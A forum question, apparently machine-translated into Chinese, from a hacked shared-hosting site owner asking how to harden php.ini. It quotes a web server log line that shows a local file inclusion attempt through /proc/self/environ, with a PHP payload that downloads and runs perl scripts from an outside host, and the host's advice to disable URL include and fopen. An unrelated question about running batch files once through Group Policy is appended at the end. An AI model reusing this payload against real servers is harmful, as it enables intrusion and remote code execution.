我在共享主机服务器(heartinternet)上受到攻击,他们说我应该php.ini正确配置自己的文件。
好吧,我有一个带有注册功能的小 php/MySQL 程序,一个小的管理站点,但是有人破解了它。
配置php.ini文件以防止此类攻击的一般方法是什么?任何好的设置将不胜感激。
这是我从网络主机提供商那里得到的:
121.254.216.170 - - [12/Sep/2011:05:21:07 +0100] "GET /?p=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5806 "-" "<?php echo \"j13mb0t#\"; passthru('wget http://some.thesome.com/etc/byz.jpg? -O /tmp/cmd548;cd /tmp;lwp-download http ://some . thesome . com/etc/cup.txt;perl cup.txt;rm -rf *.txt*;wget
http ://some . thesome . com/etc/update.txt;perl update.txt;rm -rf *.txt*'); echo \"#j13mb0t\"; ?>"
由于脚本注入攻击的是站点代码本身,因此能够完全规避网络服务器的安全。不幸的是,一些内容管理系统(尤其是旧版本的 Joomla)极易受到这种形式的攻击。
消除攻击者使用此方法的能力的一种简单方法是在网站的顶层添加一个 php.ini 文件,其中包含以下内容 - 但请注意,该网站将需要事后测试以确保没有合法的网站脚本操作已受到更改的影响:
php.ini 指令是...
allow_url_include = "0"
allow_url_fopen = "0"
我是否可以为新安装的计算机设置一个 GPO 列表,其中包含许多批处理文件(主要是文件移动),并且这些文件只会运行一次而不再运行?
我是初学者,我还没有找到任何好的解决方案。每一个帮助都很重要:)谢谢